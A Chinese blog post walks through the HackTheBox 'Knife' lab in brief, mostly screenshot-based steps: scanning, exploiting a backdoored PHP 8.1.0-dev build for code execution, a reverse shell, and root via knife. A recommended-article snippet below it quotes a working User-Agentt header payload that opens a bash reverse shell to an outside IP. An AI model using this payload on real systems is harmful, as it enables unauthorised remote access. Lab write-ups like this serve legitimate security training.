hackthebox --knife

最新推荐文章于 2024-07-19 06:29:56 发布
最新推荐文章于 2024-07-19 06:29:56 发布
阅读量112 收藏
点赞数
分类专栏: hackthebox
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47156475/article/details/119494717
版权

文章目录

一、信息收集

首先,先使用nmap扫描一下目标主机开启了那些端口跟服务
在这里插入图片描述
恩,看到只有两个常见的端口开放,访问一下80端口
在这里插入图片描述
这个页面没有什么有价值的东西,于是继续深入扫描一波
在这里插入图片描述
没有发现太多有价值的东西,使用dirb扫描试试看

在这里插入图片描述
没有什么收获

二、获取普通用户权限

使用nikto试试看
在这里插入图片描述
发现这个存在最新爆出的漏洞,尝试看看有没有修复
在这里插入图片描述
可以远程代码执行,于是反弹shell
在这里插入图片描述
使用连接,成功获取james权限
在这里插入图片描述

三、提权

使用knife进行提权
在这里插入图片描述
在这里插入图片描述

总结

声明:hackthebox系列的文章,均是本人根据真实做题经历,并参考国内或国外文章制作而成,如有冒犯之处,请联系我进行修改

weixin_47156475
关注
专栏目录
paddle 56 将图像分类模型嵌入到目标检测中并实现端到端的部署(用图像分类模型进行目标检测切片分类)
a486259的博客
12-24 1431
目标检测在功能上一直是涵盖了图像分类的,其包含目标切片检测,目标切片分类。由于某些原因,需要将目标检测的功能退化为检测,忽略其切片分类,使用外部的分类模型。然而这样操作会使得其与原始的部署代码不兼容,为此博主实现将图像分类模型嵌入到目标检测中,并实现端到端的部署。这里以ppyoloe模型为改造案例,关于图像分类模型可以使用任意PaddleClas支持的模型。关于构造PaddleClas模型可以查阅。
HackTheBox-Knife靶场实战
qq_36584013的博客
05-26 632
HackTheBox-Knife靶场实战 靶场信息 信息搜集 首先使用nmap进行端口扫描 我们得知开启了22和80端口 出于能不爆破就不爆破的原则,先访问80端口看一下 80端口上的内容有点不明所以。 在完全没思路的情况下,尝试使用dirbuster工具进行了目录爆破,但四十分钟过去了却没有一丁点收获,连robots.txt页面也不存在。 我的思路就卡在这里了,一时之间不知道应该...
Hack the Box Knife 靶机渗透
Shadow的博客
07-23 289
Knife靶机渗透 目标:得到root权限,取得user.txt,root.txt 作者:shadow 时间:2021-07-23 请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 Nikto查看漏洞,发现php版本8.1.0 查找是否有已知漏洞exploit PHP 8.1.0-dev版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通..
HackTheBox--Knife
七天
07-19 457
Knife 测试过程。
HackTheBox-Knife
qq_26947429的博客
08-26 344
今天我们来打hack the box里面的靶场 1,首先连接openvpn实现访问到靶机 ping一下靶机地址测试网络连通 2,nmap来扫描服务器开了什么端口 从这里可以看出靶机开了22和80端口,随手试了几个ssh的弱口令没啥用,只能从80端口入手了,先访问网站 首页没发现可以利用的地方,再用dirsearch扫一波目录 扫描出来的目录访问之后没啥作用 3,我们来识别一波CMS用kali的whatweb来识别一波 这里看到了X-Powered-By[PHP/8.1.0-dev]不同寻常百度
HackTheBox-Cap
LYJ20010728的博客
08-22 214
HackTheBox-Knife连接配置渗透测试信息搜集漏洞挖掘getshell提权 连接配置 参考之前的文章步骤配置 LAB ACCESS,文章链接 渗透测试 信息搜集 先用 Namp 扫描一下目标靶机,发现开放了 22、80 两个端口 sudo nmap 10.10.10.245 用 dirb 扫描网站发现没有什么有用信息 漏洞挖掘 发现 Security Snapshot(5 Second PCAP + Analysis) 可以下载流量包,经过测试后发现只有 url
Hack the box knife
qq_41696858的博客
07-15 160
1.nmap -sC -sV 10.10.10.242 //常规扫 22,80端口 2.wappalyzer扫指纹 注意到PHP版本是8.1.0-dev 这个版本的PHP最近被爆出来存在远程代码执行漏洞 具体看这个:https://zhuanlan.zhihu.com/p/381142917 直接上payload User-Agentt: zerodiumsystem("/bin/bash -c ‘bash -i >&/dev/tcp/10.10.14.113/6666 0>&1
【Hack The Box】Linux练习-- Knife
人间体佐菲的博客
11-24 343
【Hack The Box】Linux练习-- Knife
TensorFlow-Keras预训练模型测试
信道者
07-06 1万+
在tf.keras.applications里有多个预训练的模型类。这些类继承了tf.keras.Model类,使用比较方便。在实例化这些类之后,程序会自动下载参数,存储于本地硬盘。本文测试了这些预训练模型,并发现测试结果普遍差于论文声称结果。
TensorFlow北大公开课学习笔记8-复现vgg16并实现图片识别
qq_37791134的博客
11-06 3738
https://www.cs.toronto.edu/~frossard/post/vgg16/ 】img_ready = re_img.reshape((1, 224, 224, 3)) ValueError: cannot reshape array of size 200704 into shape (1,224,224,3)因为图片是四通道的,为啥?224*334*4=200704 ...
测试集(2)-words
热门推荐
马如林的IT博客
11-26 5万+
 aa.ma.mabandonabandonabattoirabilityabilityableableabnormalabnormalaboardaboardaboutaboutaboveaboveabracadabraabroadabroadabsenceabsenceabsentabsent
python瓦登尔湖词频统计
weixin_30500105的博客
11-01 5663
#瓦登尔湖词频统计: import string path = 'D:/python3/Walden.txt' with open(path,'r',encoding= 'utf-8') as text: words = [raw_word.strip(string.punctuation).lower() for raw_word in text.read().split()...
毕业设计论文Nodejs+Vue宠物店管理系统.docx
10-16
毕业设计论文
(自适应手机版)响应式化工工业企业模板_网站整站打包下载.zip
10-16
(自适应手机版)响应式化工工业企业模板_网站整站打包下载.zip
金蝶与C#对接操作手册.doc
10-16
金蝶EAS凭证引入 “webservice接口”说明
毕业设计论文Django+Vue应届生求职系统.docx
10-16
毕业设计论文
idea插件之Fast-Request-API-Buddy-2024.1.7.1
10-16
安装插件重启即可,可以使用所有功能,不会提示收费弹窗
包含 10 个不同奧运会项目的 1000 张标记图像数据集
最新发布
10-16
包含 10 个不同奧运会项目的 1000 张标记图像数据集 数据说明: 该数据集包含 10 个不同奧运会项目的 1000 张标记图像:田径、羽毛球、篮球、足球、手球、橄榄球、游泳、网球、水球和举重。 所有图像的分辨率相同,为 1000x562像素,来自YouTube上的奧林匹克频道,这些帧的速率为25fps。数据集经过注释平衡和均匀分布,每个类别有 100 张图像,整个数据集共有 1000 张图像。 由于视频数据的可用性,这个数据集中的图像是从 YouTube视频中收集和随机捕获的,这些视频是真实的奥运会,包括从 1996年亚特兰大奥运会到最近在里约热内卢举行的 2016 年奥运会的不同赛事。 数据集收集代表了游戏中各种场景和视角的自然动作池,并描绘了多种观看条件下的奥林匹克赛事,这些条件包括运动员的位置、相机视角和尺度的变化。
嵌入式-优质嵌入式项目之基于STM32的多功能数控电源设计-附原理图+PCB+程序-优秀毕业设计.zip
10-16
嵌入式_优质嵌入式项目之基于STM32的多功能数控电源设计_附原理图+PCB+程序_优秀毕业设计
swagger、swagger2、knife-swagger
06-07
Swagger是一种用于描述RESTful API的语言和工具,它可以生成API的文档和客户端代码。Swagger可以根据API的定义生成一个交互式文档,包括API的请求和响应格式、参数、错误信息等等,让开发者更方便地了解和使用API。 Swagger2是Swagger的升级版,它提供了更强大的功能和更好的性能。Swagger2支持更多的API定义格式,包括YAML和JSON,同时还提供了更好的UI和更多的插件支持。 Knife-swagger是一个基于Swagger2的Java库,它提供了一组工具和API,用于在Java应用程序中集成Swagger2。Knife-swagger可以自动扫描应用程序中的API定义,并生成Swagger2格式的API文档。同时,它还提供了一组API,用于在应用程序中动态生成Swagger2文档和UI。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值